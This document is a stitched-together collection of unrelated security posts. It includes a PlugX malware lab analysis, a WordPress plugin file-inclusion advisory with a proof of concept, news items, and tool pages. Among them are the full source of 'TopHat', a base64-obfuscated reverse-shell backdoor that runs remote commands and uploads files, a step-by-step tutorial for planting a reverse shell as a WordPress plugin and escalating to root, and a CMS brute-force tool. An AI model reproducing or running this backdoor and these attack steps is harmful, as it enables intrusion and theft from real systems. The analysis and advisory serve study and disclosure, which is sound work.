333e2767c8e575fbbb1c47147b9f9643, into memory using the LZNT1 algorithm by leveraging ntdll.dll.RtlDecompressBuffer API. The DLL contains the PE header replaced with the “XV” value. Restoring the PE header signature allows us to recover the malicious DLL. Next, the payload will start performing different actions to achieve persistence. On Windows 7 and beyond, PlugX creates a folder “%ProgramData%\RasTl” where “RasTl” matches the installation settings defined in the builder. Then, it changes the folder attributes to “SYSTEM|HIDDEN” using the SetFileAttributesW API. Next, copies its three components into the folder and sets all files with the “SYSTEM|HIDDEN” attribute. The payload also modifies the timestamps of the created directory and files with the timestamps obtained from ntdll.dll using the SetFileTime API. Then it creates the service “RasTl” where the ImagePath points to “%ProgramData%\RasTl\avp.exe” If the builder options had the Keylogger functionality enabled, then it may create a file with a random name such as “%ProgramData%\RasTl\rjowfhxnzmdknsixtx” that stores the key strokes. If the payload has been built with Screen capture functionality, it may create the folder “%ProgramData%\RasTl \RasTl\Screen” to store JPG images in the format <datetime>.jpg that are taken at the frequency specified during the build process. The payload may also create the file “%ProgramData%\DEBUG.LOG” that contains debugging information about its execution (also interesting that during execution the malware outputs debug messages about what is happening using the OutputDebugString API. This messages could be viewed with DebugView from SysInternals). The malicious code completes its mission by starting a new instance of “svchost.exe” and then injects the malicious code into svchost.exe process address space using process hollowing technique. The pictures below shows the first step of the process hollowing technique where the payload creates a new “svchost.exe” instance in SUSPENDED state. and then uses WriteProcessMemory API to inject the malicious payload Then the main thread, which is still in suspended state, is changed in order to point to the entry point of the new image base using the SetThreadContext API. Finally, the ResumeThread API is invoked and the malicious code starts executing. The malware also has the capabilities to bypass User Account Control (UAC) if needed. From this moment onward, the control is passed over “svchost.exe” and Plug-X starts doing its thing. In this case we have the builder so we know the settings which were defined during building process. However, we would like to understand how could we extract the configuration settings. During Black Hat 2014, Takahiro Haruyama and Hiroshi Suzuki gave a presentation titled “I know You Want Me – Unplugging PlugX” where the authors go to great length analyzing a variety of PlugX samples, its evolution and categorizing them into threat groups. But better is that the Takahiro released a set of PlugX parsers for the different types of PlugX samples i.e, Type I, Type II and Type III. How can we use this parser? The one we are dealing in this article is considered a PlugX type II. To dump the configuration, we need to use Immunity Debugger and use the Python API. We need to place the “plugx_dumper.py” file into the “PyCommands” folder inside Immunity Debugger installation path. Then attached the debugger to the infected process e.g, “svchost.exe” and run the plugin. The plugin will dump the configuration settings and will also extract the decompressed DLL We can see that this parser is able to find the injected shellcode, decode its configuration and all the settings an attacker would set on the builder and also dump the injected DLL which contains the core functionality of the malware. In terms of networking, as observed in the PlugX controller, the malware can be configured to speak with a controller using several network protocols. In this case we configured it to speak using HTTP on port 80. The network traffic contains a 16-byte header followed by a payload. The header is encoded with a custom routine and the payload is encoded and compressed with LZNT1. Far from a comprehensive analysis we launched a Shell prompt from the controller, typed command “ipconfig” and observed the network traffic. In parallel, we attached a debugger to “svchost.exe” and set breakpoints: on Ws2_32.dll!WSASend and Ws2_32.dll!WSARecv to capture the packets ; on ntdll.dll!RtlCompressBuffer and ntdll.dll!RtlDecompressBuffer to view the data before and after compression. ; On custom encoding routine to view the data before and after. The figure below shows a disassemble listing of the custom encoding routine. So, from a debugger view, with the right breakpoints we could start to observe what is happening. In the picture below, on the left-hand side it shows the packet before encoding and compression. It contains a 16-byte header, where the first 4-bytes are the key for the custom encoding routine. The next 4-bytes are the flags which contain the commands/plugins being used. Then the next 4-bytes is the size. After the header there is the payload which in this case contains is output of the ipconfig.exe command. On the right-hand side, we have the packet after encoding and compressing. It contains the 16-byte header encoded following by the payload encoded and compressed. Then, the malware uses WSASend API to send the traffic. Capturing the traffic, we can observe the same data. On the controller side, when the packet arrives, the header will be decoded and then the payload will be decoded and decompressed. Finally, the output is showed to the operator. Now that we started to understand how C2 traffic is handled, we can capture it and decode it. Kyle Creyts has created a PlugX decoder that supports PCAP’s. The decoder supports decryption of PlugX Type I.But Fabien Perigaud reversed the Type II algorithm and implemented it in python. If we combine Kyle’s work with the work from Takahiro Haruyama and Fabien Perigaud we could create a PCAP parser to extract PlugX Type II and Type III. Below illustrates a proof-of-concept for this exercise against 1 packet. We captured the traffic and then used a small python script to decrypt a packet. No dependencies on Windows because it uses the herrcore’s standalone LZNT1 implementation that is based on the one from the ChopShop protocol analysis and decoder framework by MITRE. That’s it for today! We build a lab with a PlugX controller, got a view on its capabilities. Then we looked at the malware installation and debugged it in order to find and interpret some of its mechanics such as DLL search order hijacking, obfuscated shellcode, persistence mechanism and process hollowing. Then, we used a readily available parser to dump its configuration from memory. Finally, we briefly looked the way the malware communicates with the C2 and created a small script to decode the traffic. Now, with such environment ready, in a controlled and isolated lab, we can further simulate different tools and techniques and observe how an attacker would operate compromised systems. Then we can learn, practice at our own pace and look behind the scenes to better understand attack methods and ideally find and implement countermeasures. References: Analysis of a PlugX malware variant used for targeted attacks by CRCL.lu Operation Cloud Hopper by PWC PlugX Payload Extraction by Kevin O’Reilly Other than the authors and articles cited troughout the article, a fantastic compilation about PlugX articles and papers since 2011 is available here. Credits: Thanks to Michael Bailey who showed me new techniques on how to deal with shellcode which I will likely cover on a post soon. Source: countuponsecurity.com

WordPress Redirection plugin version 2.7.3 suffers from a remote file inclusion vulnerability. Details ================ Software: Redirection Version: 2.7.3 Homepage: https://wordpress.org/plugins/redirection/ Advisory report: https://advisories.dxw.com/advisories/ace-file-inclusion-redirection/ CVE: Awaiting assignment CVSS: 9 (High; AV:N/AC:L/Au:S/C:C/I:C/A:C) Description ================ ACE via file inclusion in Redirection allows admins to execute any PHP file in the filesystem Vulnerability ================ If you are logged in as an administrator on any site by using the setup page for the redirection plugin you can run arbitrary code and completely compromise the system. This is done by writing the URL to redirect to in the format file://path/to/file/here. Unfortunately the plugin executes any PHP within that file. This means that any file with any extension on the filesystem that contains a small amount of user controlled data can be turned into a back door. The plugin also has the functionality to create files and place user controlled data in them. This results in attacker controlled code running and complete compromise of the system. When the code for handling a redirect looks at the URL to redirect to it does the following: class Pass_Action extends Red_Action { function process_before( $code, $target ) { // Determine what we are passing to: local URL, remote URL, file if ( substr( $target, 0, 7 ) === \'http://\' || substr( $target, 0, 8 ) === \'https://\' ) { echo @wp_remote_fopen( $target ); die(); } else if ( substr( $target, 0, 7 ) === \'file://\' ) { $parts = explode( \'?\', substr( $target, 7 ) ); if ( count( $parts ) > 1 ) { // Put parameters into the environment $args = explode( \'&\', $parts[1] ); if ( count( $args ) > 0 ) { foreach ( $args as $arg ) { $tmp = explode( \'=\', $arg ); if ( count( $tmp ) === 1 ) $_GET[ $arg ] = \'\'; else $_GET[ $tmp[0] ] = $tmp[1]; } } } include( $parts[0] ); exit(); } else { $_SERVER[\'REQUEST_URI\'] = $target; if ( strpos( $target, \'?\' ) ) { $_SERVER[\'QUERY_STRING\'] = substr( $target, strpos( $target, \'?\' ) + 1 ); parse_str( $_SERVER[\'QUERY_STRING\'], $_GET ); } } return true; } } The above code behaves as expected if the url to redirect to is a HTTP or HTTPS URL. If the URL begins with file:// it passes the path to the include function. Its also worth mentioning that if the URL is not http, https or file, then the code allows the $_GET parameter to be contaminated with unescaped values, which may result in SQL injections. Proof of concept ================ echo a<?php phpinfo();a > dog-meme.jpg Visit /wp-admin/media-new.php Upload dog-meme.jpg Copy the URL of the file (i.e. http://localhost/wp-content/uploads/2017/10/dog-meme.jpg) Visit /wp-admin/tools.php?page=redirection.php Fill aSource URLa with a/testa Fill aTarget URLa with afile:///var/www/html/wp-content/uploads/2017/10/dog-meme.jpga (this will probably require some modification if your WP installation is at a different path or dog-meme.jpg is saved in a different directory) Set aGroupa to aRedirectionsa Press aAdd Redirecta Press aEdita on the newly added redirect Press the cog icon Set aWhen matcheda to aPass-througha Press aSavea Mitigations ================ Upgrade to version 2.8 or later. Disclosure policy ================ dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://advisories.dxw.com/disclosure/ Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf. This vulnerability will be published if we do not receive a response to this report with 14 days. Timeline ================ 2017-10-02: Discovered 2017-10-03: Reported via website contact form 2017-10-04: Response received. Plugin author reports this as intended behaviour, as it is assumed that the administrator has full access to the system. However, also future version will include a fix. 2017-10-18: Author reported fixed in 2.8 2018-06-12: Advisory published Discovered by dxw: ================ Glyn Wintle Please visit advisories.dxw.com for more information. Source

_____ _ _ _ |_ _|__ _ __ | | | | __ _| |_ | |/ _ \| '_ \| |_| |/ _` | __| | | (_) | |_) | _ | (_| | |_ |_|\___/| .__/|_| |_|\__,_|\__| |_| Description: TopHat is a inspired by metasploits capabilties of meterpreter however i have coded a script to generate a - undetected encrypted backdoor using python. Usage: ./TopHat <lhost> <lport> Download TopHat.py Mirror: #!/usr/bin/python # -*- coding: utf-8 -*- import socket import os import sys import time import base64 from Crypto.PublicKey import RSA from Crypto.PublicKey import RSA from subprocess import check_output if len(sys.argv) == 3: addresser = sys.argv[1] porterica = sys.argv[2] else: print """ _____ _ _ _ |_ _|__ _ __ | | | | __ _| |_ | |/ _ \| '_ \| |_| |/ _` | __| | | (_) | |_) | _ | (_| | |_ |_|\___/| .__/|_| |_|\__,_|\__| |_| Description: TopHat is a inspired by metasploits capabilties of meterpreter however i have coded a script to generate a - undetected encrypted backdoor using python. Usage: ./TopHat <lhost> <lport> """ sys.exit() print "[*] Generating SSL Certificates" time.sleep(3) #Generate new key that's 4096 bits long new_key = RSA.generate(4096) #Export the key in PEM format public_key = new_key.publickey().exportKey("PEM") private_key = new_key.exportKey("PEM") backdoor_code_ot = """ import socket import subprocess import os from Crypto.PublicKey import RSA def encrypt(message): publickey = '''""" + public_key + """''' encryptor = RSA.importKey(publickey) encryptedData = encryptor.encrypt(message, 0) return encryptedData[0] def decrypt(cipher): privatekey = '''""" + private_key + """''' decryptor = RSA.importKey(privatekey) return decryptor.decrypt(cipher) def transfer(s,path): if os.path.exists(str(path)): f = open(path, 'rb') packet = f.read(1024) while packet != '': s.send(packet) packet = f.read(1024) s.send('DONE') f.close() else: s.send('File not found') def connect(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('""" + addresser + """',""" + porterica + """)) while True: command = decrypt(s.recv(1024)) if 'exit' in command: s.close() break if 'grab' in command: grab, path = command.split('*') try: transfer(s, path) except Exception, e: s.send(str(e)) pass else: CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) result = CMD.stdout.read() if len(result) > 512: for i in range(0, len(result), 512): chunk = result[0+i:512+i] s.send(encrypt(chunk)) else: s.send(encrypt(result)) #s.send(encrypt(CMD.stderr.read())) def main(): connect() if __name__ == '__main__': main() """ backerraka = base64.b64encode(backdoor_code_ot) backdoor_code = "import base64, sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('" + backerraka + "')))" def encrypt(message): publickey = public_key encryptor = RSA.importKey(publickey) encryptedData = encryptor.encrypt(message, 0) return encryptedData[0] def decrypt(cipher): privatekey = private_key decryptor = RSA.importKey(privatekey) return decryptor.decrypt(cipher) def transfer(conn, command): conn.send(command) f = open('/root/Desktop/somefile', 'wb') while True: bits = conn.recv(1024) if 'File not found' in bits: print '[-] File not found' break if bits.endswith('DONE'): print '[-] File transfer complete' f.close() break f.write(bits) f.close() def connect(): print "[*] Creating Backdoor..." liag = open("backdoor.py","w") liag.write(backdoor_code) liag.close() print "[*] Started reverse handler on %s:%s" % (addresser,porterica) print "[*] Starting the payload handler..." s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.bind((addresser,int(porterica))) s.listen(1) conn, addr = s.accept() print '[*] TopHat session 1 opened %s:%s -> %s\n' % (addresser,porterica,addr) while True: store = '' command = raw_input("tophat > ") command = encrypt(command) if 'exit' in command: #Send terminate signal to the client conn.send('exit') #Close the connection to the client on the server end conn.close() sys.exit() if 'grab' in command: transfer(conn, command) else: conn.send(command) result = conn.recv(1024) if len(decrypt(result)) == 512: store = store + decrypt(result) result = conn.recv(512) store = store + decrypt(result) else: print decrypt(result) def main(): connect() if __name__ == '__main__': main() Source: pastebin.com

While hackers already hunt for ways to steal money, some vulnerabilities further allow them for successful crypto hacks. Recently, experts from Chinese cybersecurity firm Qihoo’s 360 Netlab revealed a massive theft of $20 Million worth of Ethereum by hackers. Apparently, a Geth vulnerability allowed the hackers to make this theft possible from unsafe clients. Geth Vulnerability Made Ethereum Clients Unsafe A few months ago, 360 Netlab, a Chinese cybersecurity company, told crypto traders about how a Geth vulnerability could let hackers steal money. The issue affected port 8545 which allowed for a hacker to access Geth clients. Now, the researchers confirm that their speculation was right. In fact, not only they confirmed the vulnerability, but they also proved its functionality. According to their recent tweet, hackers have already stolen Ethereum from unsecured Geth clients worth $20 million. Geth is a famous client meant for running full Ethereum nodes that enables the users to manage them remotely through JSON-RPC interface. According to 360 Netlab, Geth by default ‘listens on port 8545’. The hackers, thus, actively look for vulnerabilities in this 8545 port to steal cryptocurrency. Usually, this port is available only locally and is not open to the external internet. Therefore, anyone having this port open publicly is a target for being hacked. Securing Your Wallets From Hackers A quick scan of the hacker’s address will let you know the exact amount. When LHN looked over the hackers account (0x957cD4Ff9b3894FC78b5134A8DC72b032fFbC464), the amount stolen seems to have increased further, crossing the amount of Ether reported earlier (38,642.23856 ETH). At the time of writing this article, the hacker’s wallet shows 38,642.68624 ETH as available. This proves that the hackers are still actively stealing money from unsecured wallets. According to 360 Netlab, you can view these addresses in the payload. “If you’ve honeypot running on port 8545, you should be able to see the requests in the payload which has the wallet addresses. There are quite a few IPs scanning heavily on this port now.” The researchers have also disclosed some wallet addresses that supposedly belong to hackers. Users should only connect with Geth clients from local computers. They can also enable user-authorization for remote RPC connections. Via latesthackingnews.com

Brute Force Tool WordPress , Joomla , DruPal , OpenCart , Magento XBruteForcer Simple brute force script [1] WordPress (Auto Detect Username) [2] Joomla [3] DruPal [4] OpenCart [5] Magento [6] All (Auto Detect CMS) Usage Short Form Long Form Description -l --list websites list -p --passwords Passwords list Example perl XBruteForcer.pl -l list.txt -p passwords.txt BUG? Submit new issue pm me in gmail do you want ask about all my tools ? you can add me in https://fb.me/mohamed.riahi.official.account Installation Linux git clone https://github.com/Moham3dRiahi/XBruteForcer.git cd XBruteForcer perl XBruteForcer.pl -l list.txt -p passwords.txt Installation Android Download Termux cpan install LWP::UserAgent cpan install HTTP::Request git clone https://github.com/Moham3dRiahi/XBruteForcer.git cd XBruteForcer perl XBruteForcer.pl -l list.txt -p passwords.txt Installation Windows Download Perl Download XBruteForcer Extract XBruteForcer into Desktop Open CMD and type the following commands: cd Desktop/XBruteForcer-master/ perl XBruteForcer.pl -l list.txt -p passwords.txt Source

Microsoft’s Patch Tuesday updates for June 2018 address a total of 50 vulnerabilities, including nearly a dozen critical remote code execution flaws affecting Windows and the company’s Edge and Internet Explorer web browsers. None of the security holes patched this month appear to have been exploited for malicious purposes, but one of them has been publicly disclosed before the release of a fix. The disclosed vulnerability is a use-after-free issue that allows an attacker to execute arbitrary code if they can convince the targeted user to open a malicious web page or file. The weakness was reported to Microsoft through Trend Micro’s Zero Day Initiative (ZDI), which made some details public after its 120-day deadline expired. The list of critical vulnerabilities also includes CVE-2018-8225, which impacts the Windows DNS component DNSAPI.dll. An attacker can leverage this flaw to execute arbitrary code in the context of the Local System Account by using a malicious DNS server to send specially crafted DNS responses to the targeted system. Another critical RCE flaw, which Microsoft believes could be exploited in the wild at some point, is CVE-2018-8251 and it impacts the Windows Media Foundation component. An attacker can exploit this flaw to take complete control of a system by getting the targeted user to open a malicious web page or document. A security hole affecting the HTTP Protocol Stack (Http.sys) allows remote code execution by sending a specially crafted packet to the targeted server. While the flaw can be exploited without authentication and is considered critical, Microsoft believes exploitation is “less likely.” The latest security updates also resolve a privilege escalation vulnerability affecting the Cortana voice assistant. The flaw, related to an issue disclosed earlier this year by researchers Amichai Shulman and Tal Be’ery, has been classified as “important” as exploitation requires physical or console access and the targeted system needs to have Cortana enabled. Microsoft also released some mitigations for the recently disclosed Variant 4 of the Spectre/Meltdown vulnerabilities. Adobe has yet to release any Patch Tuesday updates, but the company did resolve a Flash Player zero-day vulnerability earlier this month. The researchers who came across the exploit revealed that the flaw had been leveraged in attacks aimed at entities in the Middle East. Via securityweek.com

Shout out to Chaos Monkey and DustinFinn on Twitter Did you ever want to know how hackers get a reverse shell by compromising your WordPress install? Well wonder no more! After obtaining admin access to your WordPress (this means we either leveraged a vulnerability on your site with an existing vuln that you didn’t patch, guessed your password, or cracked the hash if we were able to obtain it, also by leveraging a vuln) we trick your WordPress into thinking we’re installing a plugin when in reality we’re uploading a shell script which connects us to your underlying file server. So the pre-req is to have admin access to the WordPress site in order for this vector to work. We cannot add plugins or themes as a guest or some other user. After that we go into the Plugins section of the dashboard and add a new one. On our attack box (this is the computer we are going to use to catch the shell into your fileserver) we open up a Netcat listener by going into Terminal and typing something like this: nc -lvp 1337 nc stands for Netcat -lvp Is listen, verbose and port 1337 is the port number on our attack box we are listening on We then create a text file which will contain our shell. For this example let’s use Pentest Monkey’s reverse shell On Kali Linux it is located here: /usr/share/webshells/php/php-reverse-shell.php We copy the contents of the reverse shell into the blank text file. At the top of the file, right under <?php We insert the lines needed for a WordPress Plugin called a header: It doesn’t matter what it says The header starts with /* and ends with */ <?php /* Plugin Name: BlackRoomSec's Evil Reverse Shell Plugin URI: https://www.blackroomsec.com Description: Gets Tara into your cybers, duh! Version: 1.0 baby Author: BRS Author URI: http://www.blackroomsec.com Text Domain: evil-shell Domain Path: /languages */ Then underneath that is the shell script (I snipped this) set_time_limit (0); $VERSION = "1.0"; $ip = '10.10.10.10'; // CHANGE THIS $port = 1337; // CHANGE THIS $chunk_size = 1400; $write_a = null; $error_a = null; $shell = 'uname -a; w; id; /bin/sh -i'; $daemon = 0; $debug = 0; // // Daemonise ourself if possible to avoid zombies later // // pcntl_fork is hardly ever available, but will allow us to daemonise / We change these two lines $ip = '10.10.10.10'; // CHANGE THIS $port = 1337; // CHANGE THIS to the IP address of our attack box we are using to catch the shell. If we’re practicing and doing the attack on a vulnerable machine on our own network or on the same subnet, nothing else is needed. However, in some cases if we are attacking a site on the Internet and want to reverse that into our box we have to either forward our ports to accepting incoming traffic OR We can use an attack box that is publicly accessible like a free-tiered Amazon EC2 instance or Google instance. In that case we would use the Public IP address of that system and start a Netcat listener on THAT system and then issue commands from there. The file then gets saved. We then compress the file in .ZIP format as that is the format needed for WordPress plugins and themes. We click install inside WordPress. It says it installs. And then once we hit “activate” our shell will be popped in our Terminal that was listening on port 1337. This gets us in as the www-data user typically. Or, in other words, GUEST. We now need to escalate our privileges by finding a way further into the box. This involves a number of enumeration techniques but typically we will first find a directory that www-data can access and write to. Usually the /tmp/ directory. How we test write capabilities is we issue the command touch test Where touch is the command to create a blank file and “test” is the name of the file. You can call it anything. Then we will copy our enumeration scripts into the files we create. Make them executable. (chmod +x filename) And run them and see what the results give us. Our goal is to get to the root user. Once we get root it’s an End Game scenario for you. We have complete control over your fileserver. Can create users, delete them, change passwords, anything we want. DM me on Twitter with questions. I have them open again for the time being. Source: blackroomsec.com

Full Video: 02:08 - Begin of Recon 14:00 - XXE Detection on Fulcrum API 17:40 - XXE Get Files 23:40 - XXE File Retrieval Working 24:30 - Lets Code a Python WebServer to Aid in XXE Exploitation 39:45 - Combining XXE + SSRF (Server Side Request Forgery) to gain Code Execution 47:28 - Shell Returned + Go Over LinEnum 56:49 - Finding WebUser's Password and using WinRM to pivot 01:06:00 - Getting Shell via WinRM, finding LDAP Credentials 01:14:00 - Using PowerView to Enumerate AD Users 01:27:06 - Start of getting a Shell on FILE (TroubleShooting FW) 01:35:35 - Getting shell over TCP/53 on FILE 01:37:58 - Finding credentials on scripts in Active Directories NetLogon Share, then finding a way to execute code as the Domain Admin... Triple Hop Nightmare 01:58:10 - Troubleshooting the error correctly and getting Domain Admin! 02:03:54 - Begin of unintended method (Rooting the initial Linux Hop) 02:09:54 - Root Exploit Found 02:12:25 - Mounting the VMDK Files and accessing AD.

Due to the surge in cryptocurrency prices, not only hackers but also legitimate websites and mobile apps are increasingly using cryptocurrency miners to monetize by levying the CPU power of your PC and phones to mine cryptocurrencies. However, Apple wants to protect your Mac and iPhone battery from shady cryptocurrency mining apps, and therefore, the company has put restrictions on such apps by disallowing them in its official App Store. The company has updated the Hardware Compatibility section of its App Store guidelines, which now explicitly restrict iOS and Mac apps and ads from mining cryptocurrency in the background. "Apps, including any third party advertisements displayed with them, may not run unrelated background processes, such as cryptocurrency mining," the updated guidelines read. The update reportedly occurred last week, possibly in response to popular Mac app Calendar 2 that bundled a Monero (XMR) miner in with its premium upgrade that unlocked 'advanced' paid features of the scheduling app. Cryptocurrency mining is not a new concept, but the technology has recently been abused in the past years after hackers found it a great way to make millions of dollars by hijacking computers to secretly perform cryptocurrency mining in the background without users' knowledge or consent. Due to this cryptocurrency mining has emerged as one of the biggest threats, raising negative sentiments towards this alternative revenue scheme. However, it seems like Apple guidelines ban any on-device mining that eventually ends up draining Apple devices' batteries by using the device processing power to mine cryptocurrency. However, as long as the mining process is performed somewhere other than the device, such as a remote server or a cloud provider, Apple doesn't have any problem. Wallet apps for cryptocurrency are also fine if the developer is enrolled as an organization, as of apps that facilitate transactions or transmissions of cryptocurrencies, since these apps are offered by the exchanges. In addition, Apple guidelines also state that cryptocurrency apps "may not offer currency for completing tasks, such as downloading other apps, encouraging other users to download, posting to social networks." Apple is not the first one to ban direct mining. Last month, Google also banned cryptocurrency mining extensions from its Chrome Web store to prevent cryptojacking by extensions that maliciously mine digital currencies without users' awareness. In late March, Twitter also announced its plan to block cryptocurrency-related ads on its platform, and in January, Facebook banned all ads promoting cryptocurrencies, including Bitcoin and initial coin offerings (ICOs). Via thehackernews.com

[+] AUTOR: Heitor Gouvêa [+] SITE: https://heitorgouvea.me [+] EMAIL: hi@heitorgouvea.me [+] GITHUB: https://github.com/GouveaHeitor [+] TELEGRAM: @GouveaHeitor See complete documentation here How it works Tor enables users to surf the Internet, chat and send instant messages anonymously, and is used by a wide variety of people for both Licit and Illicit purposes. Tor has, for example, been used by criminals enterprises, Hacktivism groups, and law enforcement agencies at cross purposes, sometimes simultaneously. Nipe is a Script to make Tor Network your Default Gateway. This Perl Script enables you to directly route all your traffic from your computer to the Tor Network through which you can surf the Internet Anonymously without having to worry about being tracked or traced back. Download and install: git clone https://github.com/GouveaHeitor/nipe cd nipe cpan install Switch JSON LWP::UserAgent Commands: COMMAND FUNCTION install Install dependencies start Start routing stop Stop routing restart Restart the Nipe process status See status Examples: perl nipe.pl install perl nipe.pl start perl nipe.pl stop perl nipe.pl restart perl nipe.pl status Bugs Report bugs in my email: hi@heitorgouvea.me License This work is licensed under MIT License Contribution Your contributions and suggestions are heartily♥ welcome. (✿◕‿◕) See here the contribution guidelines Source